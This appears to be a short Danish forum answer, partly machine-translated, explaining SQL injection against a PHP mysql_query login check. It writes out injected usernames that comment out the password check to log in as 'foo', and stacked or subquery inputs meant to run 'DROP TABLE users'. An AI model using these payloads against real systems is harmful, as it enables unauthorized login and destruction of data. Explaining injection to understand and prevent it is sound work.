Noget som dette burde gøre:
- For at logge ind som bruger "foo" skal du indstille brugernavnet til "foo" -- "
Dette vil få din forespørgsel til at se ud
$res = mysql_query("SELECT * from users where user='foo' -- ' AND pass=''");
"--" betyder, at resten af linjen er kommenteret ud
- Ikke sikker på, om dette vil virke, men prøv at indstille brugernavnet til "foo" ELLER (DROP TABLE-brugere) -- "
Dette vil få din forespørgsel til at se sådan ud:
$res = mysql_query("SELECT * from users where user='foo' OR (DROP TABLE users) -- ' AND pass=''");
accepterer det måske ikke - jeg tror, at underforespørgsler kun kan SELECT.
Mysql_query-funktionen vil kun køre én forespørgsel - andre vil lade dig gøre dette:
$res = mysql_query("SELECT * from users where user='foo'; DROP TABLE users -- ' AND pass=''");